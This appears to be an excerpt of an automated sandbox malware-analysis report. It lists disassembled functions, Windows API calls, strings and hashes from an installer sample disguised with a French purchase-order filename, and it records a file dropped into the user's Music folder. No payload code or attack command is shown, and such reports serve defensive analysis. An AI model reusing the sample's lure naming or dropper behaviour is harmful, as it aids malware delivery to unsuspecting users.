                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 1451636040-1158693248
                                                        • Opcode ID: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                        • Instruction ID: 1e30126d7328232efec95edeb0659339e9715d7a4c2dcddc2072aaf334070cd4
                                                        • Opcode Fuzzy Hash: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                        • Instruction Fuzzy Hash: EBF01270900108BBDF215F61CD0ABEE3779EB10345F00803AFA06B51D0D7F8AA558B99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004047B2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(Stedtillgs Setup: Completed,Stedtillgs Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D2,000000DF,0000040F,00000400,00000000), ref: 00404840
                                                        • wsprintfA.USER32 ref: 00404848
                                                        • SetDlgItemTextA.USER32(?,Stedtillgs Setup: Completed), ref: 0040485B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$Stedtillgs Setup: Completed
                                                        • API String ID: 3540041739-1690554567
                                                        • Opcode ID: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                        • Instruction ID: ac025ec359353314cc5270af0c4b085ff7d14dcca326c3d749765100b4f994c7
                                                        • Opcode Fuzzy Hash: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                        • Instruction Fuzzy Hash: 2F11E27360012437DB00626D9C4AFEF3659DBC2334F24423BFA29B71D1E9789C6282E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                          • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                          • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Completed,00402C51,00402C51,Completed,00000000,00000000,00000000), ref: 00405025
                                                          • Part of subcall function 00404FC9: SetWindowTextA.USER32(Completed,Completed), ref: 00405037
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                          • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                        • String ID: `7B
                                                        • API String ID: 2987980305-3208876730
                                                        • Opcode ID: b1fd6d595788f4215f5bd3486e282a6884663c05417798ea4a9ed00f5c5b9fb3
                                                        • Instruction ID: f6a91bdf01fdb4a856c4cb7ab8675b48806981152caa269ce110007ec06e39c8
                                                        • Opcode Fuzzy Hash: b1fd6d595788f4215f5bd3486e282a6884663c05417798ea4a9ed00f5c5b9fb3
                                                        • Instruction Fuzzy Hash: 3321D872904215F6CF107FA4CE4DA6E79B0AB44358F60823BF601B62D0DBBD4941DA5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                        • Instruction ID: 6a9a95a3d1c289ebb6cdea9d4b31099183be5c714bdf59020cec6d7c6c818ba9
                                                        • Opcode Fuzzy Hash: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                        • Instruction Fuzzy Hash: 27114C71A00108FFDF21AF90DE49DAA3B7DEB54349F104136FA06B10A0DBB49E51AF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?), ref: 00401CD0
                                                        • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                        • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 0996fb78d6c1f481d5f30590086a3f444e47b09fbafeabaac561346a7c7ab868
                                                        • Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
                                                        • Opcode Fuzzy Hash: 0996fb78d6c1f481d5f30590086a3f444e47b09fbafeabaac561346a7c7ab868
                                                        • Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401D29
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                        • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID:
                                                        • API String ID: 3808545654-0
                                                        • Opcode ID: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                        • Instruction ID: 060246e538297e9e1c784849604c8f7f1088759f99002d8560b965ebc89bd25b
                                                        • Opcode Fuzzy Hash: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                        • Instruction Fuzzy Hash: 43018671958340AFEB015BB0AE0EB9E3FB4EB15705F208439F141B72E2C57854159B2F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040576E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 00405774
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,004033C9), ref: 0040577D
                                                        • lstrcatA.KERNEL32(?,00409014), ref: 0040578E
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3936084776
                                                        • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                        • Instruction ID: 1a6830d2c1c169c874c5ca2981f80c8a3f1a40f12e9be47e1b60bd4f3e9b1918
                                                        • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                        • Instruction Fuzzy Hash: 9BD0A9A2609A306AE20222199C05E8F6A08CF02300B040032F605B62A2C63C0E429BFE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                        • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                          • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                        • String ID:
                                                        • API String ID: 1404258612-0
                                                        • Opcode ID: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                        • Instruction ID: b3fcdbc9dd76458da788cdf58b6f95538f5ce151b2f15d12b0a955ad6fee60ce
                                                        • Opcode Fuzzy Hash: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                        • Instruction Fuzzy Hash: F31173B1900218BEDB01EFA5DD41D9EBBB9EF04344F10807AF505F61A1E7389E54DB28
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404F3D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00404F6C
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00404FBD
                                                          • Part of subcall function 00404018: SendMessageA.USER32(000103F2,00000000,00000000,00000000), ref: 0040402A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                        • Instruction ID: afe80570641b081ecec8a2a4254b7c73db9dd8a02ece8fbff1c9a9ba965e2ecd
                                                        • Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                        • Instruction Fuzzy Hash: EB0175F110424AAFDF209F51DD81A9B3725E7C4750F144037FB007A2D1D7798C62AB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\Music\magmaen.Pre,00000000,?,?,00000000,00000011), ref: 0040250E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: FileWritelstrlen
                                                        • String ID: C:\Users\user\Music\magmaen.Pre
                                                        • API String ID: 427699356-1368223089
                                                        • Opcode ID: 6488bc6fcfbc3cae407dbb1a421d1427c85d733e782842b39ab670187b505b31
                                                        • Instruction ID: ec6543fef349a6256ae9c0be30bf33b46acbb68c9f58cc1a2edee276f495746f
                                                        • Opcode Fuzzy Hash: 6488bc6fcfbc3cae407dbb1a421d1427c85d733e782842b39ab670187b505b31
                                                        • Instruction Fuzzy Hash: 71F089B2A14244BFEB40EBA49E49AAB7768DB40304F10443BB142F61C2D6FC4941EB6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004036D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,004036A9,76233410,004034D6,?), ref: 004036EC
                                                        • GlobalFree.KERNEL32(00000000), ref: 004036F3
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004036E4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-3936084776
                                                        • Opcode ID: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                        • Instruction ID: d9d7596a2fa150d819e6a74e3d7b6637a3ae96b25f0f67a325cd61ef5fdce0bc
                                                        • Opcode Fuzzy Hash: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
                                                        • Instruction Fuzzy Hash: 98E08C32801020ABC6215F65AD0475ABB687F88B22F06082AE8007B3A09BB66C815AC9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004057B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 004057BB
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe,80000000,00000003), ref: 004057C9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3125694417
                                                        • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                        • Instruction ID: 707dbef540ece1ff312b000549851e46262dd825b0763663a0da280226ece44d
                                                        • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                        • Instruction Fuzzy Hash: A4D0A76241CE705EF30352149C00B8F6A58CF12700F090462E180A7591C27C0D414BBE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004058D4 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                        • lstrcmpiA.KERNEL32(00405B03,00000000), ref: 004058FC
                                                        • CharNextA.USER32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 0040590D
                                                        • lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2076263908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2076221187.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076287439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076336164.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2076445483.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Commande No 00007 de M.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
